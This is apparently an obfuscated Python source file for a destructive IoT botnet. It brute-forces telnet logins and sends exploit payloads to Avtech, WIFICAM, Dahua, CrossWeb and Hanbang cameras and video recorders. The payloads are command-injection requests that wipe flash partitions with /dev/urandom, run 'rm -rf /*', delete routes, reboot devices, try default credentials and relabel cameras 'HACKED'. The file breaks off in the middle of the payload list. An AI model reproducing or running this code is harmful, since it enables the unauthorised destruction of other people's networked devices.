OOOoOooO * Ii11i1iIi - OOooOO0 if I1i1111i111i [ i1i11II1i ] == 2 : if 1 - 1: oOOo0000o - i1IIi1i1iiI . i1 * Ii IiiI [ i1i11II1i ] += O0 if 34 - 34: oOOo0000o . OOooOO0 / Ii11i1iIi + Oo0Oo try : O0 = re . sub ( '[\x00-\x1f]' , '' , O0 ) ; O0O0 . send ( O0 ) except : pass if 11 - 11: oOOo0000o if '\n' in o0ii1iiIIIIi1i [ i1i11II1i ] or '\r' in o0ii1iiIIIIi1i [ i1i11II1i ] : I1i1111i111i [ i1i11II1i ] = 3 o0ii1iiIIIIi1i [ i1i11II1i ] = '' try : O0O0 . send ( '\r\n' ) except : pass continue if 25 - 25: o0oooooO % O0oo / i1IIi1i1iiI . Oo0Oo - O0oo0OOOOO00 / i1IIi1i1iiI if I1i1111i111i [ i1i11II1i ] == 4 : if 85 - 85: i1 % Ii11i1iIi / i1IIi1i1iiI % IIiIIiIii1I IiiI [ i1i11II1i ] += O0 if 84 - 84: oOOo0000o + i1 + i1IIi1i1iiI . O0oo % IIiII * oOoO0Ooo if '\n' in o0ii1iiIIIIi1i [ i1i11II1i ] or '\r' in o0ii1iiIIIIi1i [ i1i11II1i ] : o0ii1iiIIIIi1i [ i1i11II1i ] = '' I1i1111i111i [ i1i11II1i ] = 5 continue if 42 - 42: IIiIIiIii1I if I1i1111i111i [ i1i11II1i ] == 6 : i1I1iiIII11 ( O0O0 ) continue if 73 - 73: Oo0Oo + IIiIIiIii1I else : i1I1iiIII11 ( O0O0 ) continue if O0O0 in O0o0 : if I1i1111i111i [ i1i11II1i ] == - 1 : if 60 - 60: i1IIi1i1iiI . IIiIii1iI - IIiIIiIii1I / OOooOO0 / OOOoOooO % O0oo if 66 - 66: i1IIi1i1iiI * Oo0 if 93 - 93: Oo0 - OOOoOooO / IIiIIiIii1I . O0oo0OOOOO00 * o0ooO if 96 - 96: Oo0Oo . o0oooooO + OOOoOooO - oOOo0000o * I11I1Ii if 84 - 84: O0oo * i1 / Oo0 + I11I1Ii . oOOoO00oo0 if 31 - 31: Ii11i1iIi + Oo0 try : if 32 - 32: i1IIi1i1iiI O0O0 . send ( '\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\xff\xfd\x18' ) except : i1I1iiIII11 ( O0O0 ) continue I1i1111i111i [ i1i11II1i ] = 0 continue if I1i1111i111i [ i1i11II1i ] == 1 : if 39 - 39: Ii / O0oo . OOOoOooO . OOOoOooO try : if 87 - 87: IIiIIiIii1I * OOOoOooO + Ii % o0oooooO / O0oo O0O0 . send ( oOo0oO000 [ i1i11II1i ] [ 2 ] ) except : i1I1iiIII11 ( O0O0 ) continue I1i1111i111i [ i1i11II1i ] = 2 continue if I1i1111i111i [ i1i11II1i ] == 3 : if 53 - 53: Oo0Oo + oOoO0Ooo try : if 67 - 67: i1IIi1i1iiI % oOOo0000o + o0oooooO + i1IIi1i1iiI O0O0 . send ( oOo0oO000 [ i1i11II1i ] [ 3 ] ) except : i1I1iiIII11 ( O0O0 ) continue I1i1111i111i [ i1i11II1i ] = 4 continue if I1i1111i111i [ i1i11II1i ] == 5 : i1I1iiiI1iI = '\r\nLogin incorrect. Try again.\r\n' try : if 98 - 98: OOOoOooO * oOOoO00oo0 . OOooOO0 / I11I1Ii % O0oo0OOOOO00 / i1IIi1i1iiI O0O0 . send ( i1I1iiiI1iI ) except : i1I1iiIII11 ( O0O0 ) continue I1i1111i111i [ i1i11II1i ] = 6 if 19 - 19: OOooOO0 + O0oo0OOOOO00 * i1IIi1i1iiI continue if 15 - 15: I11I1Ii . o0ooO if 32 - 32: O0oo if I1i1111i111i [ i1i11II1i ] == 0 : OoO0oOoooo = iIIiiIiI if Iioo0OooOoO - O0O0o00 [ i1i11II1i ] > OoO0oOoooo : o0ii1iiIIIIi1i [ i1i11II1i ] = '' I1i1111i111i [ i1i11II1i ] = 1 continue if 78 - 78: O0oo + OOOoOooO OoO0oOoooo = i1111iI if Iioo0OooOoO - O0O0o00 [ i1i11II1i ] > OoO0oOoooo : if 44 - 44: O0oo0OOOOO00 % Oooo / Ii11i1iIi . i1IIi1i1iiI i1I1iiIII11 ( O0O0 ) continue if 55 - 55: oOOoO00oo0 - Oooo - OOooOO0 * IIiIii1iI if 19 - 19: Ii11i1iIi / Ii % I11I1Ii . O0oo . Oo0Oo . O0oo if 25 - 25: Oo0Oo + i1IIi1i1iiI / OOooOO0 - o0ooO * i1 if 61 - 61: i1 . o0ooO . IIiIii1iI / OOooOO0 if 36 - 36: IIiIii1iI - Ii if 5 - 5: o0oooooO + i1 if 67 - 67: I11I1Ii / OOooOO0 * i1 + O0oo0OOOOO00 * o0oooooO / Ii11i1iIi if 22 - 22: O0oo0OOOOO00 % IIiIIiIii1I - OOOoOooO + oOOoO00oo0 + Oo0Oo if 88 - 88: IIiII if 41 - 41: OOooOO0 - IIiII Ii11iIIiI1I1 = 20 OO0Oo0 = 120 if 75 - 75: I11I1Ii % oOOoO00oo0 / oOOo0000o i1Iiii1i11i = 95 if 19 - 19: O0oo / i1 OoO000oo0ooO = 500 if 77 - 77: OOOoOooO if 53 - 53: Ii if 80 - 80: i1IIi1i1iiI / oOoO0Ooo - Oo0 . oOoO0Ooo + Ii11i1iIi / i1IIi1i1iiI if 86 - 86: i1 % i1 / i1 % O0oo - OOooOO0 + Oo0 O00OiiI1iIiiI = [ ] Oooo0 = { } I1iiO000o00o0 = { } if 86 - 86: OOooOO0 . o0oooooO % O0oo0OOOOO00 % i1 + i1IIi1i1iiI - Ii Iii1iiiI = { } if 30 - 30: Oo0Oo i1I11IIIIIi = { } if 3 - 3: o0ooO * IIiIIiIii1I % Ii * i1 iIIiii11Ii1 = [ ] ooOo0I1ii1i = { } IiI1i1ii1 = { } if 19 - 19: i1IIi1i1iiI * Oo0Oo oo0 = { } iIoO000oO = { } if 5 - 5: o0oooooO * i1 - Ii * IIiIii1iI - Oo0Oo if 30 - 30: oOoO0Ooo - Oo0 - Oooo if 86 - 86: I11I1Ii iI1iiIi1i = 'GET ../////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// HTTP/1.0\r\n\r\n' if 20 - 20: O0oo / Oooo * Oo0 * i1IIi1i1iiI / Ii11i1iIi if 49 - 49: i1IIi1i1iiI + IIiIii1iI % o0oooooO def IIi1IIii11I1I ( targetip , targetport ) : if 12 - 12: i1IIi1i1iiI * IIiIIiIii1I / Ii - oOoO0Ooo % Ii global i1Iiii1i11i if 1 - 1: oOOo0000o + Oooo / Oo0Oo + o0ooO - OOOoOooO * IIiII if 77 - 77: o0oooooO % o0ooO if 97 - 97: O0oo / IIiIii1iI / Ii * I11I1Ii if 24 - 24: Oo0 . oOOo0000o - Oo0Oo O0000oO0O = ( targetip , int ( targetport ) ) I11i1I = hash ( O0000oO0O ) if I11i1I in iIIiii11Ii1 : if 18 - 18: I11I1Ii return ; if 54 - 54: IIiIIiIii1I - Oooo + O0oo0OOOOO00 . OOOoOooO if 82 - 82: Oooo . Oo0Oo + IIiIii1iI / OOooOO0 IiI1i1ii1 [ I11i1I ] = 0 ooOo0I1ii1i [ I11i1I ] = ( targetip , int ( targetport ) ) oo0 [ I11i1I ] = time . time ( ) + ( i1Iiii1i11i * 60 ) iIoO000oO [ I11i1I ] = None iIIiii11Ii1 . append ( I11i1I ) if 19 - 19: oOOo0000o def i1iiiiIi ( targetip , targetport , jobhash ) : O0000oO0O = ( targetip , int ( targetport ) ) if 23 - 23: i1IIi1i1iiI . IIiIii1iI / oOOoO00oo0 * Oooo / O0oo O0OOo00o00o = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) O0OOo00o00o . setblocking ( 0 ) if 2 - 2: O0oo % I11I1Ii * oOoO0Ooo / O0oo try : O0OOo00o00o . connect ( O0000oO0O ) except : pass if 25 - 25: o0ooO + Ii I11i1I = hash ( O0OOo00o00o ) O00OiiI1iIiiI . append ( O0OOo00o00o ) Oooo0 [ I11i1I ] = ( targetip , int ( targetport ) ) Iii1iiiI [ I11i1I ] = 0 if 76 - 76: IIiIii1iI * I11I1Ii * IIiIii1iI if 53 - 53: IIiIIiIii1I i1I11IIIIIi [ I11i1I ] = time . time ( ) I1iiO000o00o0 [ I11i1I ] = jobhash iIoO000oO [ jobhash ] = O0OOo00o00o if 7 - 7: i1IIi1i1iiI % o0ooO - oOOo0000o + Oo0 * oOoO0Ooo return O0OOo00o00o if 48 - 48: O0oo0OOOOO00 % Ii * I11I1Ii def i1ii1iIII ( webhash ) : if 83 - 83: OOOoOooO * i1IIi1i1iiI - OOOoOooO . O0oo if 76 - 76: o0ooO + IIiIIiIii1I + oOOoO00oo0 - oOoO0Ooo if 70 - 70: o0ooO * i1 * Oo0 if 6 - 6: OOooOO0 + oOoO0Ooo . i1 % Oooo if 17 - 17: IIiIii1iI + IIiIIiIii1I / i1 IiI1i1ii1 [ webhash ] = None ooOo0I1ii1i [ webhash ] = None oo0 [ webhash ] = None iIoO000oO [ webhash ] = None if 84 - 84: O0oo0OOOOO00 - O0oo0OOOOO00 . Oo0 % IIiII - OOooOO0 + oOOoO00oo0 iIIiii11Ii1 . remove ( webhash ) if 87 - 87: OOooOO0 + O0oo0OOOOO00 - I11I1Ii % OOOoOooO def O00oO ( sock ) : global OoO000oo0ooO global OO0Oo0 global Ii11iIIiI1I1 if 16 - 16: O0oo I11i1I = hash ( sock ) iiIii1I1i1 = I1iiO000o00o0 [ I11i1I ] if 96 - 96: o0oooooO . Ii11i1iIi - i1IIi1i1iiI % Ii11i1iIi * i1IIi1i1iiI + Oo0Oo try : sock . close ( ) except : pass if 42 - 42: oOOo0000o / I11I1Ii . Oo0Oo % o0oooooO if 59 - 59: oOOoO00oo0 % Oooo / OOOoOooO - o0oooooO / IIiII if 27 - 27: O0oo0OOOOO00 + OOOoOooO * o0ooO / Oo0Oo . Oo0Oo Iioo0OooOoO = time . time ( ) if oo0 [ iiIii1I1i1 ] <= Iioo0OooOoO : oo0 [ iiIii1I1i1 ] = time . time ( ) + OO0Oo0 iIoO000oO [ iiIii1I1i1 ] = None IiI1i1ii1 [ iiIii1I1i1 ] += 1 if 91 - 91: oOoO0Ooo O00OiiI1iIiiI . remove ( sock ) Oooo0 [ I11i1I ] = None Iii1iiiI [ I11i1I ] = None if 78 - 78: o0oooooO . IIiIii1iI / OOooOO0 if 4 - 4: Ii11i1iIi / oOOoO00oo0 . Oooo i1I11IIIIIi [ I11i1I ] = None I1iiO000o00o0 [ I11i1I ] = None if 35 - 35: o0oooooO + O0oo def IIi1IIIIIi ( ) : global xmpinpayloads global OoO000oo0ooO if 46 - 46: Oo0 / I11I1Ii Iioo0OooOoO = time . time ( ) OO00ooo0 = iIIiii11Ii1 for IIIiiiI in OO00ooo0 : iiIii1I1i1 = hash ( IIIiiiI ) if 14 - 14: IIiII . o0ooO + Oooo if iIoO000oO [ iiIii1I1i1 ] == None : if 48 - 48: OOooOO0 * oOOoO00oo0 * OOooOO0 if IiI1i1ii1 [ iiIii1I1i1 ] >= OoO000oo0ooO : if 31 - 31: Ii i1ii1iIII ( iiIii1I1i1 ) continue if 38 - 38: O0oo0OOOOO00 / oOoO0Ooo if 7 - 7: IIiIii1iI * OOooOO0 if Iioo0OooOoO >= oo0 [ iiIii1I1i1 ] : if 52 - 52: IIiIIiIii1I * i1IIi1i1iiI O0OOo00o00o = i1iiiiIi ( ooOo0I1ii1i [ iiIii1I1i1 ] [ 0 ] , ooOo0I1ii1i [ iiIii1I1i1 ] [ 1 ] , iiIii1I1i1 ) iIoO000oO [ iiIii1I1i1 ] = O0OOo00o00o oo0 [ iiIii1I1i1 ] = 0 if 79 - 79: i1IIi1i1iiI % o0oooooO - IIiIii1iI % I11I1Ii if 36 - 36: i1 . Oo0Oo % o0oooooO / IIiII . o0oooooO def IIIiOoOO ( sock , webhash , jobhash ) : global iI1iiIi1i try : if 30 - 30: oOOoO00oo0 sock . send ( iI1iiIi1i ) except : pass if 15 - 15: oOOo0000o * Ii % o0ooO . o0ooO % i1 return 1 if 92 - 92: oOOo0000o def iI11IiI1 ( ) : global Ii11iIIiI1I1 global xmpinclient_maxconnectiontime_payload if 2 - 2: Ii * Oo0 - Ii . OOOoOooO Iioo0OooOoO = time . time ( ) if 63 - 63: o0oooooO / Oo0Oo + OOooOO0 % oOOo0000o if 16 - 16: I11I1Ii / OOOoOooO - i1 + Oo0 - oOOo0000o . O0oo0OOOOO00 O00Oo = 0.01 IIiI1i , O0o0 , IiIIiI11I = select . select ( O00OiiI1iIiiI , O00OiiI1iIiiI , [ ] , O00Oo ) for O0O0 in O00OiiI1iIiiI : I11i1I = hash ( O0O0 ) o0oo0OOOo = O0O0 . getsockopt ( socket . SOL_SOCKET , socket . SO_ERROR ) if o0oo0OOOo != 0 : if 89 - 89: o0ooO - O0oo0OOOOO00 * oOoO0Ooo / oOOoO00oo0 . oOOoO00oo0 / IIiIIiIii1I O00oO ( O0O0 ) continue if O0O0 in IIiI1i : O0 = '' try : O0 = O0O0 . recv ( 2048 ) except : pass if O0 : pass if 75 - 75: OOOoOooO / IIiII + Oo0 if 10 - 10: Oo0 + Ii . Oooo % oOOo0000o - oOOoO00oo0 + IIiIIiIii1I if 40 - 40: Oooo if 44 - 44: OOOoOooO - i1 + O0oo / Oo0 if 50 - 50: I11I1Ii % O0oo - oOOoO00oo0 if 67 - 67: Ii11i1iIi - Ii11i1iIi * Oo0 . IIiIIiIii1I + Oo0Oo if 92 - 92: Oo0Oo - IIiIIiIii1I if 96 - 96: i1IIi1i1iiI - O0oo0OOOOO00 - Oo0Oo * Ii * i1IIi1i1iiI + OOooOO0 if 78 - 78: o0oooooO - oOoO0Ooo / IIiII if 48 - 48: o0oooooO . Ii11i1iIi - oOOo0000o % o0ooO * O0oo - OOooOO0 else : O00oO ( O0O0 ) continue if O0O0 in O0o0 : if Iii1iiiI [ I11i1I ] == 0 : if 71 - 71: oOOoO00oo0 . Oo0 % OOooOO0 / IIiIii1iI * Oo0Oo iiIii1I1i1 = I1iiO000o00o0 [ I11i1I ] IIIiOoOO ( O0O0 , I11i1I , iiIii1I1i1 ) Iii1iiiI [ I11i1I ] = 1 if 70 - 70: o0ooO OoO0oOoooo = Ii11iIIiI1I1 iiIii1I1i1 = I1iiO000o00o0 [ I11i1I ] if Iioo0OooOoO - i1I11IIIIIi [ I11i1I ] > OoO0oOoooo : if 30 - 30: o0ooO * Ii11i1iIi + O0oo * Oo0Oo / OOooOO0 - o0oooooO O00oO ( O0O0 ) continue if 58 - 58: i1IIi1i1iiI % Ii11i1iIi - o0ooO + IIiIIiIii1I if 48 - 48: oOOo0000o % Oooo if 95 - 95: o0oooooO - o0ooO * oOOo0000o . i1 if 54 - 54: Ii + O0oo0OOOOO00 - Oo0 - i1IIi1i1iiI % O0oo / OOooOO0 if 41 - 41: Oo0 + oOoO0Ooo . Oo0Oo if 93 - 93: Oo0 * IIiIIiIii1I % OOooOO0 . o0ooO / O0oo / Ii if 79 - 79: IIiIIiIii1I % oOoO0Ooo if 43 - 43: o0oooooO + Ii11i1iIi * O0oo if 93 - 93: oOOo0000o / Ii11i1iIi if 62 - 62: i1IIi1i1iiI / o0ooO if 85 - 85: Oo0Oo - OOOoOooO time . sleep ( 3 ) if 11 - 11: oOoO0Ooo + O0oo0OOOOO00 / IIiIii1iI * o0ooO % Ii11i1iIi O0O = "SPLTX" if 90 - 90: o0oooooO / O0oo0OOOOO00 + o0ooO % o0oooooO . i1IIi1i1iiI if 76 - 76: Ii * O0oo if 44 - 44: IIiIii1iI if 88 - 88: i1 . IIiIIiIii1I * OOOoOooO + oOoO0Ooo % o0oooooO + Oo0 if 39 - 39: i1IIi1i1iiI - IIiIIiIii1I IIIIiI = 60 iI1iiii11I11I = 0.5 if 3 - 3: oOOoO00oo0 % O0oo % Oo0 / Oo0 * Ii11i1iIi o0O0oO = [ [ 'avtech' , 'Linux.*UPnP.*Avtech' , 'GET /cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.* HTTP/1.0\r\n\r\n' , 'GET /cgi-bin/nobody/VerifyCode.cgi?account=%%CUSTOM1%%&login=quick HTTP/1.0\r\n\r\n' , 'GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=(cat%20/dev/urandom%20%3e/dev/mtdblock3%20%26);(cat%20/dev/urandom%20%3e/dev/mtdblock4%20%26);(cat%20/dev/urandom%20%3e/dev/mtdblock6%20%26);(cat%20/dev/urandom%20%3e/dev/sda2%20%26);((sleep%2017;route%20del%20default)%20%26) HTTP/1.0\r\nCookie: SSID=%%CUSTOM1%%\r\n\r\n' , 'POST /cgi-bin/supervisor/adcommand.cgi HTTP/1.0\r\nCookie: SSID=%%CUSTOM1%%\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nDoShellCmd "strCmd=(cat%20/dev/urandom%20%3e/dev/mtdblock3%20%26);(cat%20/dev/urandom%20%3e/dev/mtdblock4%20%26);(cat%20/dev/urandom%20%3e/dev/mtdblock6%20%26);(cat%20/dev/urandom%20%3e/dev/sda2%20%26);((sleep%2015;route%20del%20default)%20%26)&"' , 'POST /cgi-bin/user/Config.cgi?/nobody HTTP/1.0\r\nCookie: SSID=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naction=set&Network.BootProto=STATIC&Network.IPAddress=10.%%RAND8%%&Network.DefaultRouter=10.%%COMP8%%&Network.SubnetMask=255.255.255.0&Network.WebPort=%%RANDPORT%%&Network.DNSServer1=1.2.3.4&Network.DNSServer2=1.2.3.5' , 'POST /cgi-bin/user/Config.cgi HTTP/1.0\r\nCookie: SSID=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naction=set&Network.BootProto=STATIC&Network.IPAddress=192.168.%%RAND16%%&Network.DefaultRouter=192.168.%%COMP16%%&Network.SubnetMask=255.255.255.0&Network.WebPort=%%RANDPORT%%&Network.DNSServer1=1.2.3.4&Network.DNSServer2=1.2.3.5&Network.UPNP.Enabled.OFF' , 'POST /cgi-bin/user/Config.cgi?action=set&Network.SMTP.Receivers=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.0\r\n\r\n' , 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' , ] , [ 'wificam' , 'GoAhead-Webs.*WIFICAM' , 'GET system.ini HTTP/1.0\r\n\r\n' , 'GET login.cgi HTTP/1.0\r\n\r\n' , 'GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&svr=192.168.1.1&port=21&user=ftp&pwd=$(cat%20/dev/urandom%20>/dev/root)&dir=/&mode=PORT&upload_interval=0\r\n\r\n' , 'GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' , 'GET /set_network.cgi?next_url=rebootme.html&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&ipaddr=10.%%RAND8%%&mask=255.255.255.0&gateway=10.%%COMP8%%&dns1=1.2.3.4&dns2=1.2.3.5&dhcp=0&port=%%RANDPORT%%\r\n\r\n' , 'GET /rebootme.htm?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' , 'GET /reboot.cgi?next_url=reboot.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' , 'GET /set_wifi.cgi?next_url=rebootme.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&enable=0&ssid=&mode=0&encrypt=0&authtype=0&keyformat=0&defkey=0&key1=&key2=&key3=&key4=&key1_bits=0&key2_bits=0&key3_bits=0&key4_bits=0&wpa_pask=&channel=0\r\n\r\n' , 'GET /rebootme.htm?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' , 'GET /reboot.cgi?next_url=reboot.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' , 'GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&svr=192.168.1.1&port=21&user=ftp&pwd=$(rm%20-rf%20/*)&dir=/&mode=PORT&upload_interval=0\r\n\r\n' , 'GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' , 'GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&svr=192.168.1.1&port=21&user=ftp&pwd=$(reboot)&dir=/&mode=PORT&upload_interval=0\r\n\r\n' , 'GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' , 'GET /set_formatsd.cgi?next_url=recordsch.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' , 'GET /recordsch.htm?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' , 'GET /set_mail.cgi?next_url=mail.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&sender=a@a.com&receiver1=;route$IFSdel$IFSdefault&receiver2=&receiver3=&receiver4=&ssl=0&svr=smtp.google.com&smtpport=25&user=&pwd= HTTP/1.0\r\n\r\n' , 'GET /mailtest.cgi?next_url=test_mail.html&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%% HTTP/1.0\r\n\r\n' , 'GET /decoder_control.cgi?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&command=26&onestep=0&11251251512431.21312321313&_=1489741007900\r\n\r\n' , 'GET /set_alias.cgi?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&alias=HACKED&next_url=alias.htm\r\n\r\n' , 'GET /set_datetime.cgi?next_url=datetime.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&ntp_svr=1.2.3.4&tz=36000&ntp_enable=0\r\n\r\n' , 'GET /camera_control.cgi?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%¶m=2&value=0&15011526173000.9650471447315604&_=1501152617300\r\n\r\n' , 'GET /camera_control.cgi?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%¶m=1&value=0&15011526173000.9650471447315604&_=1501152617301\r\n\r\n' , 'GET /camera_control.cgi?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%¶m=9&value=0&15011526173000.9650471447315604&_=1501152617302\r\n\r\n' , 'GET /camera_control.cgi?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%¶m=8&value=0&15011526173000.9650471447315604&_=1501152617303\r\n\r\n' , 'GET /decoder_control.cgi?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&command=94&onestep=0&11251251512431.21312321313&_=1489741007901\r\n\r\n' , 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' , ] , [ 'dahua' , '(["/=]more\.js|title>WEB SERVICE/dev/mtdblock6||\"' , 'POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\nHost: %%TARGETIP%%:%%TARGETPORT%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naction=7&path=\"|cat /dev/urandom >/dev/mtdblock4||\"' , 'POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\nHost: %%TARGETIP%%:%%TARGETPORT%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naction=7&path=\"|cat /dev/urandom >/dev/root||\"' , 'POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\nHost: %%TARGETIP%%:%%TARGETPORT%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naction=7&path=\"|route del default||\"' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'crossweb' , 'Cross Web Server' , 'GET /language/Swedish${IFS}&&mkdosfs${IFS}${HOME}dev${HOME}mtd0${IFS}9999${IFS}&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n' , 'GET /language/Swedish${IFS}&&mkdosfs${IFS}${HOME}dev${HOME}mtd1${IFS}9999${IFS}&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n' , 'GET /language/Swedish${IFS}&&mkdosfs${IFS}${HOME}dev${HOME}mtd2${IFS}9999${IFS}&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n' , 'GET /language/Swedish${IFS}&&mkdosfs${IFS}${HOME}dev${HOME}root${IFS}9999${IFS}&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n' , 'GET /language/Swedish${IFS}&&route${IFS}del${IFS}default&&tar${IFS}/string.js HTTP/1.0\r\n\r\n' , 'GET /language/Swedish${IFS}&&reboot&&tar${IFS}/string.js HTTP/1.0\r\n\r\n' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'hanbang' , 'Server: NVR Webserver' , 'PUT /ISAPI/Security/users/1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nX-Requested-With: XMLHttpRequest\r\nAuthorization: Basic YWRtaW46ODg4ODg4\r\nCookie: updateTips=true; streamType=0; BufferLever=1; userInfo%%TARGETPORT%%=YWRtaW46ODg4ODg4; DevID=5; language=en; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n\r\n1adminadmin10.0.0.0::administratortrue' , 'GET /ISAPI/Security/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46ODg4ODg4\r\nCookie: language=en; updateTips=true\r\n\r\n' , 'GET /ISAPI/Security/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nCookie: language=en; updateTips=true\r\n\r\n' , 'GET /ISAPI/Security/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNDU2\r\nCookie: language=en; updateTips=true\r\n\r\n' , 'GET /ISAPI/Security/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MDAwMDAw\r\nCookie: language=en; updateTips=true\r\n\r\n' , 'GET /ISAPI/Security/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNDU2Nzg=\r\nCookie: language=en; updateTips=true\r\n\r\n' , 'PUT /ISAPI/System/Video/inputs/channels/1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n\r\nHACKED' , 'PUT /ISAPI/System/Video/inputs/channels/2 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n\r\nHACKED' , 'PUT /ISAPI/System/Video/inputs/channels/3 